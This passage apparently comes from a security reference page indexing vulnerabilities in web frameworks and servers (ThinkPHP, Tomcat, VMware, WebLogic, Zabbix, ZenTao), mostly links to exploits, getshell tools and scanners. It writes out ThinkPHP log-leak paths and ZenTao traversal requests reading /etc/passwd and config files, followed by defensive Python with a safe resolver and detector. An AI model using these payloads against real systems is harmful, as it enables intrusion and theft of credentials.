[Practical tip | using a ThinkPHP 5.x bug to leak database information](https://mp.weixin.qq.com/s/B9jkF0e0SMTJ6r09Syy-8A)
[ThinkPHP 5 MySQL credential leak](https://mp.weixin.qq.com/s/R11Ha6ksbd7kslAuhyy73Q)
[Improper ThinkPHP usage can leak sensitive information](https://blog.csdn.net/Fly_hps/article/details/81201904)
[https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ](https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ)

Log leakage (the runtime log directory is often web-reachable):

```
/Application/Runtime/Logs/Home/16_09_06.log # the Application directory name may vary, e.g. App
/Runtime/Logs/Home/16_09_06.log # file name is YY_MM_DD
/Runtime/Logs/User/16_09_06.log # file name is YY_MM_DD
```

[ThinkphpGUI](https://github.com/Lotus6/ThinkphpGUI)
[ThinkPHP 6 session arbitrary file creation reproduction, with PoC](https://mp.weixin.qq.com/s/8k96KSpWMk7S4-_TzweXxg)
[One-click ThinkPHP vulnerability detection](https://github.com/Lucifer1993/TPscan)
[ThinkPHP 5 RCE detection tool](https://github.com/theLSA/tp5-getshell)
[ThinkPHP RCE scan script, with log scanning](https://github.com/sukabuliet/ThinkphpRCE)
[tangxiaofeng7/TPScan](https://github.com/tangxiaofeng7/TPScan)
[ThinkPHP all-in-one exploitation tool: GUI, command execution, one-click getshell, batch detection, log traversal, session include, BT panel bypass](https://github.com/bewhale/thinkphp_gui_tools)

## Tomcat

[Ready-to-use Tomcat 7/8/9/10 Listener/Filter/Servlet memory shells, supports injecting a command memory shell and a Behinder memory shell](https://github.com/ce-automne/TomcatMemShell)
[Apache Tomcat JMXProxy RCE](https://github.com/4ra1n/tomcat-jmxproxy-rce-exp)
[CVE-2022-26377: when httpd reverse-proxies Tomcat AJP through proxy_ajp, crafted AJP packets can be smuggled to the backend service](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)
[CVE-2022-29885: denial of service in the Apache Tomcat cluster service listener](https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/)
[Python script for scanning Apache Tomcat servers for vulnerabilities](https://github.com/p0dalirius/ApacheTomcatScanner)

## TP-Link

[CVE-2022-25064 TP-LINK TL-WR840N RCE](https://github.com/Mr-xn/CVE-2022-25064)

## Ueditor

[Baidu UEditor vulnerability summary](https://mp.weixin.qq.com/s/mH4GWTVoCel4KHva-I4Elw)
[UEditor 1.4.3.3 SSRF verification: raising the DNS rebinding success rate](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/)
[Jiuwei team, green team (improvement) | SSRF in Java code audit](https://mp.weixin.qq.com/s/bF7wJpbN4BmvT8viWGW7hw)
[When UEditor meets a certain WAF](https://mp.weixin.qq.com/s/Lf3lMzlpBq7Vq5nDf_pUcw)
[UEditor vulnerability (file upload)](https://www.jianshu.com/p/681162ed0374)
[theLSA/ueditor-getshell](https://github.com/theLSA/ueditor-getshell)

## Vmware

[CVE-2021-21974 VMWare ESXi RCE Exploit](https://github.com/Shadow0ps/CVE-2021-21974)
[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)
[Exploiting CVE-2021-44228 in VMware Horizon for remote code execution and more](https://github.com/puzzlepeaches/Log4jHorizon)
[SharpSphere: .NET project for attacking vCenter](https://github.com/JamesCooteUK/SharpSphere)
[VMWare vRealize SSRF-CVE-2021-21975](https://github.com/Henry4E36/VMWare-vRealize-SSRF)
[Vmware vhost password decrypt](https://github.com/shmilylty/vhost_password_decrypt)
[PoC for CVE-2022-22972, affecting VMware Workspace ONE, vIDM and vRealize Automation 7.6](https://github.com/horizon3ai/CVE-2022-22972)
[Tool to extract the IdP certificate from a vCenter backup and log in as administrator](https://github.com/horizon3ai/vcenter_saml_login)
[Vcenter Server CVE-2021-21985 RCE PAYLOAD](https://iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/)
[CVE-2021-21985 (Vulnerable Code)](https://github.com/alt3kx/CVE-2021-21985_PoC)
[VMware vCenter practical exploitation summary](https://www.ctfiot.com/39518.html)
[vCenter practical exploitation techniques summary](https://forum.butian.net/share/1893)

## VMware VRealize Network Insight

[VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)](https://github.com/sinsinology/CVE-2023-20887)

## Weblogic

[weblogic t3 deserialization rce](https://github.com/5up3rc/weblogic_cmd)
[Fileless memory shell for WebLogic and Tomcat](https://github.com/keven1z/weblogic_memshell)
[WebLogic vulnerability detection](https://github.com/0nise/weblogic-framework)
[CVE-2018-3245-PoC](https://github.com/pyn3rd/CVE-2018-3245)
[WebLogic one-click vulnerability scanner, v1.5, updated 2020-07-30](https://github.com/rabbitmask/WeblogicScan)
[WeblogicTool: GUI exploitation tool supporting vulnerability detection, command execution, memory shell injection, password decryption and more (by Sangfor Deep Blue Lab, Tianwei team)](https://github.com/KimJun1010/WeblogicTool)
[CVE-2020-14882 & CVE-2020-14883 WebLogic unauthenticated remote command execution](https://www.cnblogs.com/liliyuanshangcao/p/13962160.html)

## Webmin

[KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)
[vulhub/webmin/CVE-2019-15107/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md)
[jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)

## Websphere

[IBM Websphere Portal - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/36941)
[websphere_rce.py](https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py)
[WebSphere CVE-2015-7450](http://www.zstreamer.cn/2020/07/19/websphere-cve-2015-7450/)
[WebSphere ND remote command execution analysis and constructing the RpcServerDispatcher payload (CVE-2019-4279)](https://xz.aliyun.com/t/6394)
[WebSphere XXE analysis (CVE-2020-4643)](https://paper.seebug.org/1342/)
[Turning bad SSRF to good SSRF: Websphere Portal](https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/)

## Wso2

[WSO2 RCE (CVE-2022-29464) exploit](https://github.com/hakivvi/CVE-2022-29464)

## XXL-JOB

[XXL-JOB default accessToken authentication bypass](https://blog.csdn.net/qq_41904294/article/details/134201486)

## Yii

[CVE-2020-15148 Yii2 deserialization RCE POP chain analysis](https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA)
[Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)

## Zabbix

[Zabbix Saml Bypass](https://github.com/Henry4E36/zabbix-saml-bypass)
[Zabbix latest.php SQL injection (CVE-2016-10134)](https://vulhub.org/#/environments/zabbix/CVE-2016-10134/)
[Zabbix SQL injection reproduction (CVE-2016-10134)](https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw)
[CVE-2020-11800 Zabbix RCE details disclosed](https://xz.aliyun.com/t/8991)
[CVE-2021-27927: Zabbix-CSRF-to-RCE](https://mp.weixin.qq.com/s/eyVwNKRfWpSGNA7Gq8KpWA)
[CVE-2022-23131 Zabbix SAML SSO authentication bypass analysis and reproduction](https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw)
[Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)
[CVE-2022-23134 Zabbix analysis part 2: from unauthorized access to backend takeover](https://mp.weixin.qq.com/s/jq2AvDlHCosb3zViPXGTaQ)

## Zentao

CNVD-2020-65242, authenticated arbitrary file download (the content parameter is used as a file path without restriction):

```
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
```

Arbitrary file download in the backend im module's downloadXxdPackage function (path traversal through xxdFileName):

```
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
```

[Zentao v16.5 SQL Injection POC](https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go)
[ZenTao 12.4.2 backend administrator getshell reproduction](https://mp.weixin.qq.com/s/Uak631OOC48WcshaYnvsRQ)
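Both ZenTao endpoints above take a user-supplied name and use it as a path. The example below shows the unchecked join beside a guarded resolver, plus a log-review check that flags the two request shapes listed above. It is an added example, not code from the FrameVul page or from ZenTao: DOWNLOAD_ROOT is an assumed package directory, the sample query strings are constructed from the payloads above, and posixpath is used so the result is the same on any host.

```python
"""Path-traversal guard and request flagging for download endpoints like the ZenTao ones above."""
import posixpath
from typing import Optional
from urllib.parse import parse_qs, unquote

DOWNLOAD_ROOT = "/var/www/zentao/www/data/xxd"   # assumption: where packages live

# Parameters that name a file in the two endpoints listed above.
FILE_PARAMS = {"xxdFileName", "content"}


def resolve_vulnerable(root: str, name: str) -> str:
    """Unchecked join: '../' sequences or an absolute path escape root."""
    return posixpath.normpath(posixpath.join(root, name))


def resolve_safe(root: str, name: str) -> Optional[str]:
    """Accept only a bare file name that still lies directly under root after
    normalisation; decode percent-encoding first so '..%2F' is not missed."""
    name = unquote(name)
    if not name or "\x00" in name or "/" in name or "\\" in name:
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, candidate]) != root:   # escaped root
        return None
    if posixpath.dirname(candidate) != root:              # '.' or '..' edge cases
        return None
    return candidate


def flag_request(query: str) -> bool:
    """Detection side: True when a file-naming parameter of the im/file modules
    carries traversal, an absolute path or a NUL byte. Meant for access-log review."""
    params = parse_qs(query, keep_blank_values=True)
    if params.get("m", [""])[0] not in ("im", "file"):
        return False
    for key in FILE_PARAMS & params.keys():
        for raw in params[key]:
            value = unquote(raw)
            if value.startswith("/") or ".." in value or "\x00" in value:
                return True
    return False


if __name__ == "__main__":
    traversal = "../../../../../../../../../etc/passwd"
    print(resolve_vulnerable(DOWNLOAD_ROOT, traversal))   # escapes to /etc/passwd
    print(resolve_safe(DOWNLOAD_ROOT, traversal))         # None
    print(flag_request("m=im&f=downloadXxdPackage&xxdFileName=" + traversal))
```

The resolver rejects separators outright rather than relying on normalisation alone; the commonpath check stays as a second line of defence so that a future change to the allowed name syntax cannot silently reopen the escape.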